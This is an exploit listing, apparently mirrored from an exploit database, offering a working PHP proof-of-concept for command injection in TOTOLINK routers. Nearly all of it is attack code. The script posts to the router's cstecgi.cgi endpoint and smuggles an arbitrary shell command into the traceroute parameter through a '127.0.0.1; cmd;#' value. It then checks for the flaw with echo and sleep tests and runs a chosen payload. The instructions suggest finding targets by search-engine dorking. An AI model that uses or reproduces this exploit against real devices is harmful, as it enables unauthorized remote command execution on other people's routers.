Share
## https://sploitus.com/exploit?id=PACKETSTORM:182168
=============================================================================================================================================  
| # Title : TOTOLINK 9.x Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.totolink.net/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 71 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
  
class TotolinkExploit {  
private $targetUri;  
private $sleepTime;  
  
public function __construct($targetUri, $sleepTime = 3) {  
$this->targetUri = $targetUri;  
$this->sleepTime = $sleepTime;  
}  
  
// Function to send POST request and execute the command on the target  
public function executeCommand($cmd) {  
$num = rand(1, 500);  
$url = $this->targetUri . '/cgi-bin/cstecgi.cgi';  
$data = json_encode([  
"command" => "127.0.0.1; {$cmd};#",  
"num" => $num,  
"topicurl" => "setTracerouteCfg"  
]);  
  
// Send POST request  
return $this->sendPostRequest($url, $data);  
}  
  
// Check if the target is vulnerable  
public function check() {  
echo "Checking if the target can be exploited.\n";  
  
// Test using echo command to see if it's vulnerable  
$response = $this->executeCommand("echo test");  
if (!$response || strpos($response, 'success') === false) {  
return "Target is likely not vulnerable.\n";  
}  
  
// Test command injection using sleep  
echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";  
$start = microtime(true);  
$this->executeCommand("sleep {$this->sleepTime}");  
$elapsedTime = microtime(true) - $start;  
  
echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n";  
if ($elapsedTime >= $this->sleepTime) {  
return "Target is vulnerable: Blind command injection successful.\n";  
}  
  
return "Command injection test failed.\n";  
}  
  
// Exploit the vulnerability to run the payload  
public function exploit($payload) {  
echo "Executing payload on the target.\n";  
$this->executeCommand($payload);  
}  
  
// Helper function to send POST requests  
private function sendPostRequest($url, $postFields) {  
$options = [  
'http' => [  
'method' => 'POST',  
'header' => 'Content-Type: application/x-www-form-urlencoded',  
'content' => $postFields  
]  
];  
$context = stream_context_create($options);  
return file_get_contents($url, false, $context);  
}  
}  
  
// Example of usage  
$targetUri = 'http://target-ip'; // Replace with actual target URL  
$exploit = new TotolinkExploit($targetUri);  
echo $exploit->check();  
$exploit->exploit('whoami'); // Replace with your payload  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================